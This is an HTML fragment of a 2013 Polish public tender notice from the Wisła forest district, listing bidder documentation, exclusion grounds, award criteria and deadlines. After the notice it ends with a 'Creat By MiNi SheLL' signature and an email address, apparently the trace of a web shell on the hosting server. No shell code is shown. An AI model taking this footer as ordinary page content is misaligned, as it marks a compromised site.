<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz oferty, sporządzony na podstawie wzoru stanowiącego (załączniki Nr 2 SIWZ). Zamawiający żąda, aby Wykonawca w Formularzu oferty wskazał części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
2.Kosztorysy ofertowe sporządzone zgodnie z zasadami wskazanymi w Rozdziale 13 SIWZ.
3.Oświadczenie, o którym mowa w art. 44 Prawa zamówień publicznych o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Prawa zamówień publicznych, według wzoru stanowiącego załącznik nr 3 do SIWZ.
4.Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Należy wykazać roboty zgodnie z opisem zawartym w pkt 6.1.2, wypełniając załącznik nr 5 do SIWZ. 
5.Dowody - poświadczenia określające, czy roboty budowlane wykazane w Wykazie zostały  wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
lub  inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej.
Uwaga 
7.3.1. Zgodnie z § 9 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców, oraz form, w jakich te dokumenty mogą być składane (Dz.U.2013.231) wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U.2009.226.1817).
7.3.2.W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, o którym mowa w pkt 7.2 zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt. 7.2
6.Oświadczenie, że osoby, którymi będzie dysponował Wykonawca, a które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, tj. uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  konstrukcyjno budowlanej bez ograniczeń, według wzoru stanowiącego Załącznik nr 6 do SIWZ.
7.Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Uwaga:
Jeżeli fakt opłacenia polisy, nie wynika wprost z załączonego do oferty dokumentu, Wykonawca zobowiązany jest dołączyć do oferty inny dokument potwierdzający opłacenie tej składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
9.Oświadczenie o braku podstaw do wykluczenia Wykonawcy na podstawie art. 24 ust. 1 Prawa zamówień publicznych, według wzoru stanowiącego załącznik nr 4 do SIWZ.
10.Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
11.Lista podmiotów należących do tej samy grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Gwarncja - 10.00</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_wisla/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo  Wisła
ul. Czarne 6, 43-460 WISŁA.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 09:00, miejsce: Sekretariat - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo  Wisła
ul. Czarne 6, 43-460 WISŁA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com